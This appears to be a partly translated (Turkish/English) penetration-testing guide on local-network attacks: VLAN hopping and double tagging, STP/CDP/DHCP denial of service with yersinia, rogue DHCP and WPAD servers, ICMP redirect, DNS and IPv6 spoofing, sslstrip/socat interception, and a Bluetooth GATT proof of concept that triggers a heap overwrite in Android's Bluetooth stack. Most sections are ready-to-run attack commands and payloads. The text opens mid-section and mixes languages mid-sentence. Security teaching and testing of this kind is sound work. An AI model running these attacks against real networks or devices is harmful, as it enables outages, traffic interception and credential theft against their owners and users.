root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

</details>
```bash
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

Tartışılan Dynamic Trunking and creating virtual interfaces an discovering hosts inside diğer VLAN’larda gerçekleştirilen saldırılar araç tarafından otomatik olarak gerçekleştirilmektedir: https://github.com/nccgroup/vlan-hopping—frogger

Double Tagging

Eğer bir attacker, hedef host’un MAC, IP and VLAN ID of the victim host değerlerini biliyorsa, kendi atanan VLAN’ı ile hedefin VLAN’ını kullanarak bir çerçeveyi double tag a frame ile etiketlemeyi ve paket göndermeyi deneyebilir. Hedef victim won’t be able to connect back olacağından, saldırgan için en iyi seçenek, SNMP gibi bazı ilginç işlemler gerçekleştirebilen protokollerle best option for the attacker is communicate via UDP yoluyla iletişim kurmaktır.

Another option for the attacker is to launch a TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.

Bu saldırıyı gerçekleştirmek için scapy kullanabilirsiniz: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

Eğer doğrudan bağlı olduğunuz bir switch’e erişiminiz varsa, ağ içindeki VLAN segmentation’ı bypass etme imkânına sahipsiniz. Basitçe portu trunk mode’a (trunk olarak da bilinir) alın, hedef VLAN’ların ID’leri ile virtual interfaces oluşturun ve bir IP adresi yapılandırın. Adresi dinamik olarak almak için DHCP isteyebilir veya duruma göre statik olarak yapılandırabilirsiniz.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

Bazı ortamlarda, örneğin guest wireless networks gibi yerlerde, port isolation (also known as private VLAN) ayarları, bir wireless access point’e bağlı istemcilerin birbirleriyle doğrudan iletişim kurmasını engellemek için uygulanır. Ancak, bu izolasyon önlemlerini aşabilen bir teknik tespit edilmiştir. Bu teknik, ağ ACL’lerinin eksikliğinden veya yanlış yapılandırılmasından yararlanarak IP paketlerinin aynı ağdaki başka bir istemciye ulaşmak üzere bir yönlendirici (router) üzerinden yönlendirilmesini sağlar.

Saldırı, hedef istemcinin IP adresini taşıyan fakat router’ın MAC adresine sahip bir paket oluşturularak gerçekleştirilir. Bu, router’ın paketi yanlışlıkla hedef istemciye iletmesine neden olur. Bu yaklaşım, Double Tagging Attacks ile benzerlik gösterir; burada, kurbana erişimi olan bir host’un kontrol edilebilmesi güvenlik açığından yararlanmak için kullanılır.

Key Steps of the Attack:

1. Crafting a Packet: Hedef istemcinin IP adresini içeren ancak router’ın MAC adresine sahip özel bir paket hazırlanır.
2. Exploiting Router Behavior: Hazırlanan paket router’a gönderilir; yapılandırma nedeniyle router paketi hedef istemciye yönlendirir ve private VLAN tarafından sağlanan izolasyonu bypass eder.

VTP Attacks

VTP (VLAN Trunking Protocol) VLAN yönetimini merkezileştirir. VLAN veritabanı bütünlüğünü korumak için revision number’ları kullanır; yapılan herhangi bir değişiklik bu numarayı artırır. Switch’ler daha yüksek revision number’a sahip yapılandırmaları benimser ve kendi VLAN veritabanlarını günceller.

VTP Domain Roles

• VTP Server: VLAN’ları yönetir—oluşturur, siler, değiştirir. Domain üyelerine VTP announcements yayınlar.
• VTP Client: VLAN veritabanını senkronize etmek için VTP announcements alır. Bu rol local VLAN yapılandırma değişikliklerinden men edilmiştir.
• VTP Transparent: VTP güncellemelerine katılmaz ancak VTP announcements’ları iletir. VTP attacks’dan etkilenmez ve revision number’ı sabit sıfır olarak kalır.

VTP Advertisement Types

• Summary Advertisement: VTP server tarafından her 300 saniyede bir yayınlanır ve temel domain bilgilerini taşır.
• Subset Advertisement: VLAN yapılandırma değişikliklerinin ardından gönderilir.
• Advertisement Request: Genellikle daha yüksek bir configuration revision number algılandığında, bir VTP client tarafından Summary Advertisement talep etmek için gönderilir.

VTP zaafları yalnızca trunk ports üzerinden sömürülebilir çünkü VTP announcements sadece bu portlar üzerinden dolaşır. Post-DTP attack senaryoları VTP’ye yönelebilir. Yersinia gibi araçlar VTP attacks gerçekleştirmeyi kolaylaştırabilir; amaç genellikle VLAN veritabanını silmek ve böylece ağı etkisiz hale getirmektir.

Note: Bu tartışma VTP version 1 (VTPv1) ile ilgilidir.

yersinia -G # Launch Yersinia in graphical mode

Yersinia’nin graphical mode’unda, VLAN veritabanını temizlemek için deleting all VTP vlans seçeneğini seçin.

STP Attacks

Eğer arayüzlerinizde BPDU çerçevelerini yakalayamıyorsanız, bir STP attack’ında başarılı olmanız muhtemel değildir.

STP BPDU DoS

Çok sayıda BPDU — TCP (Topology Change Notification) veya Conf (topoloji oluşturulduğunda gönderilen BPDU’lar) — gönderilmesi halinde switches aşırı yüklenir ve düzgün çalışmayı durdurur.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

Bir TCP gönderildiğinde, switch’lerin CAM table’ı 15s içinde silinir. Eğer bu tür paketleri sürekli olarak gönderiyorsanız, CAM table sürekli olarak (veya her 15segs’te) yeniden başlatılacak ve yeniden başlatıldığında switch hub gibi davranır.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

Saldırgan, ağın STP root’u olmak için bir switch’in davranışını taklit eder. Böylece daha fazla veri onun üzerinden geçer. Bu, iki farklı switch’e bağlı olduğunuzda ilginçtir.
Bu, BPDUs CONF paketleri gönderilerek yapılır; paketler, saldırganın bildirdiği öncelik değerinin gerçek root switch’in öncelik değerinden daha düşük olduğunu belirtir.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Eğer attacker 2 switch’e bağlıysa, yeni ağacın root’u olabilir ve bu switch’ler arasındaki tüm trafik onun üzerinden geçer (a MITM attack will be performed).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP Attacks

CISCO Discovery Protocol (CDP) is essential for communication between CISCO devices, allowing them to identify each other and share configuration details.

Passive Data Collection

CDP, tüm portlardan bilgi yayınlayacak şekilde yapılandırılabilir; bu da bir güvenlik riski oluşturabilir. Bir saldırgan switch portuna bağlandıktan sonra Wireshark, tcpdump veya Yersinia gibi ağ sniffer’ları çalıştırabilir. Bu işlem, cihazın modeli ve çalıştırdığı Cisco IOS sürümü dahil olmak üzere ağ cihazına ait hassas bilgileri ortaya çıkarabilir. Saldırgan daha sonra belirlenen Cisco IOS sürümündeki spesifik zafiyetleri hedefleyebilir.

Inducing CDP Table Flooding

Daha agresif bir yaklaşım, meşru CISCO cihazları taklit ederek switch’in belleğini doldurup bir Denial of Service (DoS) attack başlatmayı içerir. Aşağıda, test amaçlı tasarlanmış bir network aracı olan Yersinia kullanılarak böyle bir saldırıyı başlatmak için komut dizisi verilmiştir:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

CDP Impersonation Attack

Bu saldırı sırasında switch’in CPU’su ve CDP neighbor table’ı ağır şekilde yüklenir; aşırı kaynak tüketimi nedeniyle sıklıkla “ağ felci” oluşur.

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

You could also use scapy. Be sure to install it with scapy/contrib package.

VoIP Saldırıları ve VoIP Hopper Aracı

VoIP telefonlar, giderek IoT cihazlarıyla entegre edilerek özel telefon numaraları aracılığıyla kapı açma veya termostat kontrolü gibi işlevler sunar. Ancak bu entegrasyon güvenlik riskleri yaratabilir.

Araç voiphopper, çeşitli ortamlarda (Cisco, Avaya, Nortel, Alcatel-Lucent) bir VoIP telefonunu emüle edecek şekilde tasarlanmıştır. CDP, DHCP, LLDP-MED ve 802.1Q ARP gibi protokoller kullanarak ses ağının VLAN ID’sini keşfeder.

VoIP Hopper, Cisco Discovery Protocol (CDP) için üç mod sunar:

1. Sniff Mode (-c 0): VLAN ID’sini belirlemek için ağ paketlerini analiz eder.
2. Spoof Mode (-c 1): Gerçek bir VoIP cihazına ait paketleri taklit eden özel paketler oluşturur.
3. Spoof with Pre-made Packet Mode (-c 2): Belirli bir Cisco IP phone modeline ait paketlerle özdeş paketler gönderir.

Hız için tercih edilen mod üçüncü moddur. Şunun belirtilmesi gerekir:

• Saldırganın ağ arayüzü (-i parameter).
• Emüle edilen VoIP cihazının adı (-E parameter), Cisco adlandırma formatına uymalıdır (ör. SEP ardından bir MAC adresi).

Kurumsal ortamlarda, mevcut bir VoIP cihazını taklit etmek için şunlar yapılabilir:

• Telefon üzerindeki MAC etiketini kontrol etmek.
• Model bilgilerini görmek için telefonun ekran ayarlarında gezinmek.
• VoIP cihazını bir laptopa bağlayıp Wireshark kullanarak CDP isteklerini gözlemlemek.

Üçüncü modda aracı çalıştırmak için örnek bir komut şöyle olur:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP Attacks

Enumeration

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Two types of DoS DHCP sunucularına karşı gerçekleştirilebilir. Birincisi, mevcut tüm IP adreslerini tüketmek için yeterli sayıda sahte host simüle etmekten oluşur.
Bu saldırı, yalnızca DHCP sunucusunun yanıtlarını görebiliyor ve protokolü tamamlayabiliyorsanız (Discover (Comp) –> Offer (server) –> Request (Comp) –> ACK (server)) işe yarar. Örneğin, bu Wifi networks’te mümkün değildir.

DHCP DoS gerçekleştirmek için başka bir yol, kaynak IP olarak mümkün olan her IP’yi kullanarak DHCP-RELEASE paketi göndermektir. Böylece sunucu herkesin IP’yi kullanmayı bıraktığını düşünecektir.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Bunu daha otomatik yapmak için DHCPing aracını kullanabilirsiniz.

Bahsedilen DoS saldırılarını, istemcileri ortamda yeni kiralamalar (leases) almaya zorlamak ve meşru sunucuları tükenip yanıt veremez hale getirmek için kullanabilirsiniz. Böylece meşru sunucular yeniden bağlanmaya çalıştığında, bir sonraki saldırıda belirtilen kötü amaçlı değerleri sunabilirsiniz.

Kötü amaçlı değerleri ayarlama

/usr/share/responder/DHCP.py konumundaki DHCP betiği kullanılarak bir sahte DHCP sunucusu kurulabilir. Bu, trafiği kötü amaçlı bir sunucuya yönlendirerek HTTP trafiğini ve kimlik bilgilerini yakalamak gibi network saldırıları için kullanışlıdır. Ancak, sahte bir gateway ayarlamak daha az etkilidir; çünkü bu yalnızca istemcinin giden trafiğini yakalamanıza izin verir ve gerçek gateway’den gelen yanıtları kaçırırsınız. Daha etkili bir saldırı için sahte bir DNS veya WPAD sunucusu kurmanız önerilir.

Below are the command options for configuring the rogue DHCP server:

• Our IP Address (Gateway Advertisement): Makinenizin IP’sini gateway olarak duyurmak için -i 10.0.0.100 kullanın.
• Local DNS Domain Name: İsteğe bağlı olarak yerel DNS alan adını ayarlamak için -d example.org kullanın.
• Original Router/Gateway IP: Meşru router veya gateway’in IP adresini belirtmek için -r 10.0.0.1 kullanın.
• Primary DNS Server IP: Kontrol ettiğiniz sahte DNS sunucusunun IP adresini ayarlamak için -p 10.0.0.100 kullanın.
• Secondary DNS Server IP: İsteğe bağlı olarak ikincil DNS sunucusu IP’sini ayarlamak için -s 10.0.0.1 kullanın.
• Netmask of Local Network: Yerel ağın netmask’ini tanımlamak için -n 255.255.255.0 kullanın.
• Interface for DHCP Traffic: Belirli bir ağ arayüzünde DHCP trafiğini dinlemek için -I eth1 kullanın.
• WPAD Configuration Address: WPAD yapılandırması adresini ayarlamak ve web trafiğinin yakalanmasına yardımcı olmak için -w “http://10.0.0.100/wpad.dat” kullanın.
• Spoof Default Gateway IP: Varsayılan gateway IP’sini spooflamak için -S ekleyin.
• Respond to All DHCP Requests: Sunucunun tüm DHCP isteklerine cevap vermesini sağlamak için -R ekleyin; ancak bunun gürültülü olduğunu ve tespit edilebileceğini unutmayın.

Bu seçenekleri doğru kullanarak, ağ trafiğini etkili şekilde yakalamak için bir sahte DHCP sunucusu kurulabilir.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP Saldırıları

Here are some of the attack tactics that can be used against 802.1X implementations:

• EAP üzerinden aktif brute-force parola denemeleri
• Bozuk EAP içeriği ile RADIUS sunucusuna saldırmak **(exploits)
• EAP mesaj yakalama ve çevrimdışı password cracking (EAP-MD5 ve PEAP)
• TLS sertifika doğrulamasını atlatmak için EAP-MD5 kimlik doğrulamasını zorlamak
• Hub veya benzeri cihaz kullanılarak kimlik doğrulama sonrası zararlı ağ trafiği enjekte etmek

If the attacker if between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force this using:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Saldırıları

FHRP (First Hop Redundancy Protocol), sıcak yedekli bir yönlendirme sistemi oluşturmak için tasarlanmış bir ağ protokolleri sınıfıdır. FHRP ile fiziksel router’lar tek bir mantıksal cihaz halinde birleştirilebilir; bu, hata toleransını artırır ve yükün dağıtılmasına yardımcı olur.

Cisco Systems mühendisleri iki FHRP protokolü geliştirmiştir: GLBP ve HSRP.

GLBP & HSRP Attacks

RIP

Routing Information Protocol (RIP) protokolünün üç sürümünün var olduğu bilinmektedir: RIP, RIPv2 ve RIPng. Datagramlar RIP ve RIPv2 tarafından UDP üzerinden port 520’ye gönderilirken, RIPng datagramları IPv6 multicast yoluyla UDP port 521’e yayınlar. RIPv2 MD5 kimlik doğrulama desteği getirmiştir. Buna karşılık, RIPng yerel kimlik doğrulama içermez; bunun yerine IPv6 içinde isteğe bağlı IPsec AH ve ESP başlıklarına dayanılır.

• RIP ve RIPv2: İletişim UDP datagramlarıyla port 520 üzerinden yapılır.
• RIPng: Datagramları IPv6 multicast ile UDP port 521 üzerinden yayınlar.

RIPv2’nin MD5 kimlik doğrulamayı desteklediğini, RIPng’in yerel kimlik doğrulama içermediğini ve bunun yerine IPv6’da IPsec AH ve ESP başlıklarına dayanıldığını unutmayın.

EIGRP Saldırıları

EIGRP (Enhanced Interior Gateway Routing Protocol) dinamik bir routing protokolüdür. Bu bir distance-vector protokolüdür. Eğer kimlik doğrulama yoksa ve passive interface’ler yapılandırılmamışsa, bir intruder EIGRP yönlendirmesine müdahale edebilir ve routing tables poisoning’e neden olabilir. Ayrıca, EIGRP ağı (başka bir deyişle autonomous system) düz (flat) bir yapıya sahiptir ve herhangi bir zone’a ayrılmamıştır. Eğer bir attacker bir route enjekte ederse, bu route muhtemelen autonomous EIGRP sistemi genelinde yayılacaktır.

Bir EIGRP sistemine saldırmak, meşru bir EIGRP router ile komşuluk (neighbourhood) kurmayı gerektirir; bu da temel keşiften çeşitli injection’lara kadar pek çok imkanı açar.

FRRouting size BGP, OSPF, EIGRP, RIP ve diğer protokolleri destekleyen sanal bir router uygulamanıza imkan verir. Tek yapmanız gereken onu attacker sisteminize deploy etmek; böylece routing domain içinde meşru bir router gibi davranabilirsiniz.

EIGRP Attacks

Coly EIGRP (Enhanced Interior Gateway Routing Protocol) broadcast’larını intercept etme yeteneklerine sahiptir. Ayrıca paket injection’ı yapmaya izin verir; bu da routing konfigürasyonlarını değiştirmek için kullanılabilir.

OSPF

Open Shortest Path First (OSPF) protokolünde, router’lar arasında güvenli iletişimi sağlamak için genellikle MD5 kimlik doğrulama kullanılır. Ancak bu güvenlik önlemi Loki ve John the Ripper gibi araçlar kullanılarak aşılabilir. Bu araçlar MD5 hash’lerini yakalayıp kırabilir ve kimlik doğrulama anahtarını ortaya çıkarabilir. Anahtar elde edildikten sonra yeni routing bilgileri eklemek için kullanılabilir. Route parametrelerini yapılandırmak ve ele geçirilmiş anahtarı belirlemek için sırasıyla Injection ve Connection sekmeleri kullanılır.

• MD5 hash’lerinin yakalanması ve kırılması: Bu amaçla Loki ve John the Ripper gibi araçlar kullanılır.
• Route parametrelerinin yapılandırılması: Bu Injection sekmesi üzerinden yapılır.
• Ele geçirilmiş anahtarın ayarlanması: Anahtar Connection sekmesi altında yapılandırılır.

Diğer Genel Araçlar ve Kaynaklar

• Above: Ağ trafiğini taramak ve zafiyetleri bulmak için bir araç
• Ağ saldırıları hakkında daha fazla bilgi için here bakabilirsiniz.

Spoofing

Attacker, sahte DHCP cevapları göndererek ağdaki yeni üyenin tüm ağ parametrelerini (GW, IP, DNS) yapılandırır.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Check the previous section.

ICMPRedirect

ICMP Redirect, bir IP’ye ulaşmak için en iyi yolun attacker olduğunu belirten type 1 code 5 tipinde bir ICMP packet göndermeye dayanır. Sonra, victim IP ile iletişim kurmak istediğinde packet’i attacker üzerinden gönderir.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

Saldırgan, hedefin istediği bazı (veya tüm) alan adlarını çözecektir.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

dnsmasq ile kendi DNS’inizi yapılandırın

apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Yerel Ağ Geçitleri

Sistemlere ve ağlara genellikle birden fazla rota vardır. Yerel ağdaki MAC adreslerinin bir listesini oluşturduktan sonra, IPv4 forwarding’i destekleyen hostları belirlemek için gateway-finder.py kullanın.

</details>


### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

DNS sorgulamaları başarısız olduğunda yerel host çözümlemesi için Microsoft sistemleri **Link-Local Multicast Name Resolution (LLMNR)** ve **NetBIOS Name Service (NBT-NS)**'ye güvenir. Benzer şekilde, **Apple Bonjour** ve **Linux zero-configuration** uygulamaları ağ içindeki sistemleri keşfetmek için **Multicast DNS (mDNS)** kullanır. Bu protokollerin kimlik doğrulama olmadan çalışması ve UDP üzerinden yayın yapmaları nedeniyle, kullanıcıları kötü amaçlı servislere yönlendirmeyi amaçlayan saldırganlar tarafından kötüye kullanılabilirler.

Responder kullanarak hostların aradığı hizmetlerin taklidini yapıp sahte yanıtlar gönderebilirsiniz.  
Responder ile hizmetleri nasıl taklit edeceğinize dair daha fazla bilgi için buraya bakın: [Responder ile hizmetleri nasıl taklit edeceğinize dair daha fazla bilgi](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Tarayıcılar genellikle proxy ayarlarını otomatik almak için **Web Proxy Auto-Discovery (WPAD) protokolünü kullanır**. Bu, sunucudan yapılandırma detaylarının alınmasını içerir; örneğin "http://wpad.example.org/wpad.dat" gibi bir URL üzerinden. İstemcilerin bu sunucuyu keşfetmesi çeşitli mekanizmalarla gerçekleşebilir:

- **DHCP** yoluyla; keşif özel bir 252 kodlu giriş kullanılarak sağlanır.
- **DNS** aracılığıyla; yerel alan içinde _wpad_ etiketli bir hostname aranır.
- **Microsoft LLMNR ve NBT-NS** aracılığıyla; DNS sorgulamaları başarısız olduğunda başvurulan yedek mekanizmalardır.

Responder aracı bu protokolden faydalanarak **kötü amaçlı bir WPAD sunucusu** gibi davranır. İstemcileri kendisine bağlanmaya ikna etmek için DHCP, DNS, LLMNR ve NBT-NS kullanır. Responder ile hizmetlerin nasıl taklit edileceği hakkında daha fazla ayrıntı için bkz: [spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)

Ağa farklı hizmetler sunarak bir kullanıcıyı bazı **düz metin kimlik bilgilerini** girmeye **kandırmayı** deneyebilirsiniz. Bu saldırı hakkında daha fazla bilgi için [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md) dosyasına bakın.

### IPv6 Neighbor Spoofing

Bu saldırı ARP Spoofing'e çok benzer, ancak IPv6 dünyasında gerçekleşir. Kurbanın, GW'nin IPv6 adresinin saldırganın MAC adresine ait olduğunu düşünmesini sağlayabilirsiniz.
```bash
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

</details>


### Active Discovery Notes

Dikkate alın: bir UDP paketi hedef cihazda istenen port bulunmuyorsa ICMP (Port Unreachable) mesajı gönderilir.

### **ARP discover**

ARP paketleri, ağ içinde hangi IP'lerin kullanıldığını keşfetmek için kullanılır. PC her olası IP adresi için bir istek göndermek zorundadır ve yalnızca kullanılan adresler yanıt verir.

### **mDNS (multicast DNS)**

Bettercap, **\_services\_.dns-sd.\_udp.local** için her X ms'de bir MDNS isteği gönderir; bu paketi gören cihaz genellikle bu isteğe yanıt verir. Sonrasında yalnızca "services" olarak yanıt veren cihazları arar.

**Tools**

- Avahi-browser (--all)
- Bettercap (net.probe.mdns)
- Responder

### **NBNS (NetBios Name Server)**

Bettercap, port 137/UDP'ye broadcast paketleri göndererek "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA" isimini sorgular.

### **SSDP (Simple Service Discovery Protocol)**

Bettercap, her türlü servisi aramak için SSDP paketleri yayınlar (UDP Port 1900).

### **WSD (Web Service Discovery)**

Bettercap, servisleri aramak için WSD paketleri yayınlar (UDP Port 3702).


## Bluetooth (L2CAP/ATT/GATT) Saldırıları

- Android Fluoride, L2CAP PSMs üzerinden servisleri açar (ör., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Servisler şu şekilde kaydolur:
```c
uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
uint16_t my_mtu, uint16_t required_remote_mtu,
uint16_t sec_level);

acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
acl  = ACLConnection(interface, bdaddr)
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
pkt  = b'\x20'  # opcode
pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
gatt.send(pkt)
# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite